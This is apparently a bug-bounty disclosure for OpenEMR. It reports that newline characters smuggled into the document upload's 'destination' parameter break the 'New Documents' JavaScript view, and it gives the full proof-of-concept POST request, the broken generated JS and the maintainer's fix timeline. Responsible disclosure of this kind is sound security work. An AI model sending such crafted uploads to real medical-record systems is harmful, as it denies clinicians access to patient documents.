Improper Name Validation in Upload Document Form in openemr/openemr

Valid

Reported on

Oct 6th 2022

Description

The name of any uploaded document can be manipulated using the destination parameter, to include new line characters in its name, breaking the execution of JS code in "New Documents" section from "Miscellaneous" menu, that will be blank until the document is removed from DB.

Proof of Concept

The following request was sent to upload a dummy file with a destination parameter including a new line character:

POST /openemr/controller.php?document&upload&patient_id=00&parent_id=1& HTTP/1.1
(...snip...)
Content-Type: multipart/form-data; boundary=---------------------------139184551113566022282519832587
Upgrade-Insecure-Requests: 1

-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="MAX_FILE_SIZE"

64000000
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="file[]"; filename="1234.txt"
Content-Type: text/plain

TEST
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="dicom_folder[]"; filename=""
Content-Type: application/octet-stream


-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="destination"

test
1234
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="passphrase"


-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="patient_id"

00
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="category_id"

1
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="process"

true
-----------------------------139184551113566022282519832587--

That value was used as a "virtual" name that was reflected in JS code generated from "New Documents" section:

newNode_14 = newNode.addItem(new TreeNode('2022-10-05 test
1234-16', 'file3.png', '/openemr/controller.php?document&view&patient_id=00&doc_id=16&', false, true, '', '', 'folder-expanded.gif'));

That new line break the execution of JS code that cannot show the section contents anymore, leaving the user without the option of managing files.

Uncaught SyntaxError: '' string literal contains an unescaped line break controller.php:116:60

Impact

The success exploitation of this issue could lead into a denial of service, leaving the documents section broken and not usable until the record is removed from database.

We are processing your report and will contact the openemr team within 24 hours. a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
We have sent a follow up to the openemr team. We will try again in 7 days. a year ago
openemr/openemr maintainer has acknowledged this report a year ago
Brady Miller validated this vulnerability a year ago
xkulio has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller marked this as fixed in 7.0.0.2 with commit 37d7ed a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Brady Miller published this vulnerability a year ago
Brady Miller
a year ago

Maintainer

@admin, please assign a CVE. thanks!

to join this conversation